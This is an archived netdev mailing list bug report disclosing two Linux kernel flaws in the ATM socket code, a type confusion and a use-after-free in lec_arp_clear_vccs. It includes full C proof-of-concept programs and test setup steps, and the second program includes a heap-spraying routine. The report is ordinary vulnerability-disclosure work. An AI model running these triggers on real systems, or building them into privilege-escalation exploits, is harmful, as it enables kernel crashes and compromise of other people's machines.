lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date:   Mon, 27 Apr 2020 21:15:29 +0800
From:   Gengming Liu <l.dmxcsnsbh@...il.com>
To:     netdev@...r.kernel.org
Subject: Two bugs report

We found two security bugs in the linux kernel and here's the
description of the bugs.

0.Build a testing environment
  a. Set up Ubuntu 19.04 in Vmware workstation.
  b. sudo apt install linux-image-5.0.0-21-generic.
  c. Change the grub default boot entry to 5.0.0-21-generic. (see
https://askubuntu.com/questions/100232/how-do-i-change-the-grub-boot-order)
cat /proc/version. If it is as following, it means you succeed.

"Linux version 5.0.0-21-generic (buildd@...01-amd64-036) (gcc version
8.3.0 (Ubuntu 8.3.0-6ubuntu1)) #22-Ubuntu SMP Tue Jul 2 13:27:33 UTC
2019"

  d. compile the poc by using gcc.
  e. Excute poc by "sudo ./poc"
  f. Use dmesg to check kernel message about crash.

1.atm_vcc_userback type confusion

atm(AF_ATMSVC) socket's vcc->user_back can be treated as different
types of structures.

To trigger this bug it requires CAP_NET_ADMIN.(Use sudo ./poc)

The PoC has been tested on Linux 5.0.0-21 with Vmware workstation.
Proc version is:
Linux version 5.0.0-21-generic (buildd@...01-amd64-036) (gcc version
8.3.0 (Ubuntu 8.3.0-6ubuntu1)) #22-Ubuntu SMP Tue Jul 2 13:27:33 UTC
2019

Poc:
#include <linux/socket.h>
#include <linux/atmdev.h>
#include <linux/atmarp.h>
#include <linux/atmlec.h>
#include <linux/atmsvc.h>
#include <linux/atmmpc.h>
#include <linux/atmclip.h>

int main(int argc, char const *argv[])
{
int fd;
fd = socket(0x14,3,0);
ioctl(fd,0x61d8, 0x17); //ATMMPC_CTRL

unsigned long long arg = 1;
ioctl(fd, 0x400261f2, &arg ); //ATM_SETBACKEND
ioctl(fd, 0x61e2, 1 ); //ATMARP_MKIP

char buffer[] =
"\x21\x26\x27\xc2\xdd\x6e\x1c\x96\x6e\x6b\x1e\xbb\x04\x4f\x0e\x3a\x51\x07\x22\xec\x86\x57";
setsockopt(fd,0xe0c7, 0x80, buffer,0x16);

return 0;
}

2.use-after-free in lec_arp_clear_vccs.

UAF object: struct atm_vcc *vcc

vcc is a atm(AF_ATMSVC) socket.

To trigger this bug:

1. Create vcc socket #A and #B
2. ioctl(ATMLEC_CTRL) to attach #A to lec device.
3. ioctl(ATMLEC_DATA) to attach #B to device's priv->lec_arp_empty_ones list
4. close socket #B
5. close vcc socket #A to call lec_arp_clear_vccs() to trigger UAF

To trigger this bug it requires CAP_NET_ADMIN. (Use sudo ./poc)

The PoC has been tested on Linux 5.0.0-21 with Vmware workstation.
Proc version is:
Linux version 5.0.0-21-generic (buildd@...01-amd64-036) (gcc version
8.3.0 (Ubuntu 8.3.0-6ubuntu1)) #22-Ubuntu SMP Tue Jul 2 13:27:33 UTC
2019

Poc:
#include <linux/socket.h>
#include <linux/atmdev.h>
#include <linux/atmarp.h>
#include <linux/atmlec.h>
#include <linux/atmsvc.h>
#include <linux/atmmpc.h>
#include <linux/atmclip.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <string.h>
#include <stdint.h>
#include <pthread.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>

#include <sys/uio.h>
#include <signal.h>
 #include <sys/mman.h>
#include <sys/prctl.h>

#include <sys/inotify.h>
#include <sys/types.h>          /* See NOTES */
#include <sys/socket.h>

//#include <linux/wireless.h>
#include <sys/types.h> /* See NOTES */
#include <sys/socket.h>
#include <linux/socket.h>
#include <sys/un.h>
#include <stdbool.h>
#include <netinet/in.h>
#define SOCK_PORT 10000
struct my_mmsghdr
{
struct msghdr msg_hdr; /* Message header */
unsigned int msg_len;  /* Number of bytes transmitted */
};

void *sendmmsg_client_func()
{
int sockfd2;
struct sockaddr_in *paddr;
char szbuff[2050];
int ret;

struct sockaddr_in local_addr;
local_addr.sin_port = htons(SOCK_PORT /*+ getpid()*/);
local_addr.sin_addr.s_addr = inet_addr("127.0.0.1");
local_addr.sin_family = AF_INET;

memset(szbuff, 0x2b, 2048);

sockfd2 = socket(AF_INET, SOCK_DGRAM, 0);
paddr = &local_addr;

while (0 < connect(sockfd2, paddr, sizeof(*paddr)))
{
perror("connect");
usleep(11);
}

struct msghdr msg;
struct my_mmsghdr mmsg;

struct iovec vec;

vec.iov_base = szbuff;
vec.iov_len = 1;

msg.msg_name = paddr;
msg.msg_namelen = sizeof(*paddr);
msg.msg_iov = &vec;
msg.msg_iovlen = 1;
msg.msg_control = szbuff;
msg.msg_controllen = 2048;
msg.msg_flags = 0;

mmsg.msg_hdr = msg;
mmsg.msg_len = 1;


ret = syscall(__NR_sendmmsg, sockfd2, &mmsg, 1, 0);
if (ret < 0)
{
perror("sendmmsg");
}

}
void force_loop(){
/* code */
int sockB,sockA;
int dev = 3;
struct atmlec_ioc ioc_data;


sockB = socket(0x14, 0x2, 0x0);


sockA = socket(0x14, 0x2, 0x0);

ioctl(sockA, ATMLEC_CTRL, dev);

ioc_data.dev_num = dev;
ioc_data.receive = 1;
ioctl(sockB, ATMLEC_DATA, &ioc_data);

close(sockB);
sendmmsg_client_func();

   close(sockA);

}


int main(int argc, char const *argv[])
{
force_loop();


return 0;
}

Powered by blists - more mailing lists